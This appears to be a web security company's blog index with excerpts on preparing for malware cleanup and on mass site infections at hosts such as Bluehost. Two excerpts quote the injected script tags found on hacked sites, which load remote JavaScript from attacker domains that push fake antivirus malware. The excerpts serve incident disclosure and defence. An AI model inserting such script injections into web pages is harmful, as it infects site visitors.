Ask Sucuri: What should I know when engaging a Web Malware Company?

We work in a business in which it is always chaos. In most situations the client is often distraught, vulnerable, and is plagued with this feeling of being out of control. It is the business of web malware cleanup. The last thing any website owner wants is to delay the cleanup process because of silly things that could have been easily prevented.

In our mind, there are three things you must know before engaging with any web malware company:

  • Know Your Host
  • Know How to Access Your Server
  • Have a Backup

As simple as they may appear, they still remain allusive to many.
Read More

Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group

If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Read More

Bluehost CEO blog & others exploited by domainameat.cc

We’re seeing that a good number of sites hosted at Bluehost have been hacked and infected with malware from domainameat.cc. The blog of Matt Heaton, CEO of Bluehost was also exploited (mattheaton.com).

After analyzing some of these sites, they were all hacked around 9/10am this morning. This is the malware script showing up at the bottom of the sites:

< script src = ” http://domainameat.cc/ js2.php “< </script>

This is the report from our scanner against their CEO’s blog:

Read More